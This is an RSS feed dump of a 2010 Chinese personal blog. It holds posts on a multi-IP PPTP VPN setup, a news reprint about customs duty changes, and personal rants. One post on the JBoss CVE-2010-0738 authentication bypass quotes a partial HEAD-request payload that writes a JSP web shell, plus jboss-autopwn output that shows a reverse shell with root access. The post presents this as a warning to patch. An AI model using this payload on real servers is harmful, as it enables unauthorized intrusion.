http://www.netpk.org/blog/index.php zh-cn http://www.netpk.org/blog/read.php?531 NetKnave <admin@yourname.com> Fri, 03 Sep 2010 10:40:49 +0000 http://www.netpk.org/blog/read.php?531
此处包含一个多媒体文件，请用网页方式查看。
]]> http://www.netpk.org/blog/read.php?530 NetKnave <admin@yourname.com> Sat, 14 Aug 2010 09:17:58 +0000 http://www.netpk.org/blog/read.php?530
2.设置第一个公网IP
vi /etc/pptpd.conf

localip  192.168.20.1
remoteip 192.168.20.2-254
#在最后面添加一行 第一个公网ip
listen 98.0.0.90

添加NAT映射:
iptables  -t nat -A POSTROUTING -s 192.168.20.0/24 -j SNAT --to-source 98.0.0.90

3.设置第二个公网IP

cp /etc/pptpd.conf /etc/pptpd1.conf

vi /etc/pptpd1.conf

localip  192.168.21.1
remoteip 192.168.21.2-254
#在最后面添加一行 第一个公网ip
listen 98.0.0.91

添加NAT映射:
iptables  -t nat -A POSTROUTING -s 192.168.21.0/24 -j SNAT --to-source 98.0.0.91

4.重复3复制配置文件pptpd2.conf,pptpd3.conf.......pptpd[N].conf

5.启动方法：
#pptpd -c /etc/pptpd.conf 这个已经被作为系统服务了
pptpd -c /etc/pptpd1.conf
pptpd -c /etc/pptpd2.conf
pptpd -c /etc/pptpd3.conf
........

pptpd -c /etc/pptpd[N].conf


将以上命令放入初始启动文件中
linux 自动启动服务很简单,最简单的是把启动命令放到/etc/rc.d/rc.local文件里这样就可以每次启动的时候自动启动服务了
]]> http://www.netpk.org/blog/read.php?529 NetKnave <admin@yourname.com> Mon, 26 Jul 2010 16:03:26 +0000 http://www.netpk.org/blog/read.php?529
扬子晚报7月26日报道 国家海关总署日前发布通告，决定从9月1日调整进出境个人邮递物品管理政策，关税免征额度从现在的港澳台地区400元、其他国家和地区500元降至50元，这就意味着眼下活跃在各大网站的海外代购业将受到不小的冲击。记者昨日在淘宝等网站上发现，一些海外代购商品已经开始涨价，而一些尚未调价的店主也表示价格肯定会水涨船高。

每千克奶粉征税20元

据南京海关相关人士介绍，国家调整进出境个人邮递物品管理措施，正是为了打击利用邮寄个人物品名义拆分货物、逃避国家管制及偷逃税款的商业性走私行为。

根据海关总署《入境旅客行李物品和个人邮递物品完税价格表》，奶粉的完税价为每千克200元，税率为10%，也就是说每千克奶粉的税额是20元；而香水、乳液、粉底的完税价都是每件100元，税率为50%，计算下来单件物品税额就是50元。以妈妈们喜欢的日本奶粉为例，按原来的规定，每寄25千克的奶粉才达到征税标准，相当于27罐左右，而化妆品一次可以寄10瓶才要缴税。不过，9月1日之后，邮寄1瓶化妆品就会达到应征税额的限制，奶粉按900克一罐算，一次也只能寄2罐才可以免于征税。

网购、代购涨声一片


“我们店里的奶粉已经开始涨价了！”淘宝网上一家代购美国奶粉的店主告诉记者，不仅进货地美国的奶粉价格在上涨，而且虽然还没到新规定实行的时候，海关对入境货物的管理已经越来越严格。他们家的奶粉每罐已经提价10元。尽管提了价，店主仍称，现已全线缺货。一家代购台湾奶粉的店主表示，虽然现在还没给奶粉涨价，但是他表示下一批货就要涨价。当记者问将会涨多少时，他说还不清楚，要看那个时候的成本费用。不少人认为，通过邮寄代购的网店受到严格限制的同时，一些空姐代购渠道将由此更受追捧。不过，记者就此采访了一家专门经营空姐代购的化妆品淘宝店铺，客服告诉记者，虽然是空姐代购，但是海关查得越来越严，这意味着带货越来越不方便，所以价格会稍微上涨一些。“货肯定不会变，我们的数量只能是越来越多，货品越来越全，但价格也会水涨船高。”对此，一些买家表示，不知道这次政策调整究竟会对相关商品的价格有多大影响，要看看最后涨价多少再决定以后是从网上代购还是转到商场购买，如果说价格相差无几，当然还是在商场购买比较划算，既能享受到一些活动优惠，相对而言质量也更有保证。

(本文来源：新华报业网-扬子晚报 作者：刘妍 石小磊)   ]]> http://www.netpk.org/blog/read.php?528 NetKnave <admin@yourname.com> Wed, 07 Jul 2010 18:33:37 +0000 http://www.netpk.org/blog/read.php?528 打开保存选项正打算输保存的文件名时.....悲剧发生了----------蓝屏了

我直接就无语了...今天做的很多东西都没保存..妈的

太他妈点背了 ]]> http://www.netpk.org/blog/read.php?527 NetKnave <admin@yourname.com> Mon, 14 Jun 2010 02:56:27 +0000 http://www.netpk.org/blog/read.php?527 老外发的冒似是USPS
结果入境的时候被海关扣了
直接邮了张关税单给CK，让他前去南京交1000大洋的税
真是万恶啊。总共才3000多的多西。税都要交1000大洋 ]]> http://www.netpk.org/blog/read.php?525 NetKnave <admin@yourname.com> Tue, 08 Jun 2010 14:08:13 +0000 http://www.netpk.org/blog/read.php?525
具体的感觉啥的还没有，正在充电中。
]]> http://www.netpk.org/blog/read.php?524 NetKnave <admin@yourname.com> Fri, 28 May 2010 02:38:54 +0000 http://www.netpk.org/blog/read.php?524
刚休假回来，就看到JBOSS爆出的这个漏洞，不过redhat官方已经patch了。很奇怪国内没人关注？

在Redhat 的bugzilla上看到是3月16号报告的，4月27号订正

CVE-2010-0738 实际上讲的是一个JBoss 的认证绕过漏洞，分析和POC在这里：

Good Bye Critical Jboss 0day需要翻墙

简单来说，就是因为JBOSS在配置HTTP verbs的时候，访问控制的实现有问题，导致如 HEAD等未在配置文件中允许的verb能够直接以 jbossadmin 身份调用 GET handler, 从而绕过认证。

POC如下：

    HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1

在Blackhat 2010 Europe 上发布的工具 jboss-autopwn，已经能够直接支持这个漏洞的调用了。

有人回帖给出了如下贴图：
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#

这个漏洞非常严重，因为是默认配置就存在的，受影响的版本建议自查一下。 ]]> http://www.netpk.org/blog/read.php?523 NetKnave <admin@yourname.com> Mon, 24 May 2010 18:24:58 +0000 http://www.netpk.org/blog/read.php?523 但现在越来越多的人看到这个东西有点赚头，就开始模仿着做，其实再简单不过的东西。
然后做的人越来越多，晚上分晰了一下最少有近50家以上，市场就这么多，然后就是没生意。
而且新出现的人还玩价格战，这东西本来就没有多少赚头，首先他的量就摆在那呢。
最终的结果就是：没搞头了。。
正如我开始做这个的时候说的一样，这玩意最多能搞二年三年的。然后就基本玩完了。
是时候开始发展新玩意儿了。
要不然买奶粉的钱都没有咯 ]]> http://www.netpk.org/blog/read.php?522 NetKnave <admin@yourname.com> Fri, 07 May 2010 14:42:58 +0000 http://www.netpk.org/blog/read.php?522 每天都有事。一会这一会那的。。真是烦人呐
处理完一件少一件吧。
老家那些政府单位的个个跟大爷似的。饿的个神啊。一天上个把小时班。
办事还得起早。过了中午11点基本就没人干正事了。
悲剧啊 ]]> http://www.netpk.org/blog/read.php?521 NetKnave <admin@yourname.com> Wed, 21 Apr 2010 13:32:05 +0000 http://www.netpk.org/blog/read.php?521 xxx号改路线了，只停华强中1，其它所有车停华强中2。
以前公交从来没有见过有排队的，今天一下去看到有人排队，大喜。。我草。都开始有人排队了。有进步啊。
我和媳妇都在那排着呢，不到一会儿就排了好长的队了。
这会儿来了一台车，排队的人一个个的上车，到我的时候正好车上满了，司机就关门准备开车走人，就在车动的时候，后面又来了一台空的XXX路车，前面还没开走，后面那二B司机就停在后门把前门后门打开了，这下好了。本来排的好好的队伍，队伍后面跟中间那群B人，全冲向后面的车了，这时前面已满的车开走了，真他干了。所有人都乱七八糟的跑那把车门堵上了，挤啊。我也跟着后面，最后上车。
等我上车后涮了卡，大声对司机喊了句：前面队排的好好的，你在这开什么门啊？（本来想开问之前加一句：你TM的是不是有病？结果一想算了。少说脏话）
那司机假装没听见。。真他妈草蛋

我就想不通了。这素质。。。哎。啥也不说了。天朝本来就没有相对公平的环境，排队算是相对比较公平的方式了。
结果还是成这鸟样了。。杯具啊
还有华强北堵车不是一天两天了。不过我发现，不是车多堵的，堵车全是因为-----人。。全是些他妈的不看灯过马路的
人家机动车绿灯他们都一路小跑到马路对面，真他妈的是轻松加愉快啊。
素质啊。。。。。

哎。再扯一句废话吧

矿难来了。结果忘了大旱。地震来了结果忘了大旱。。
还有人记得矿工的事不 ]]>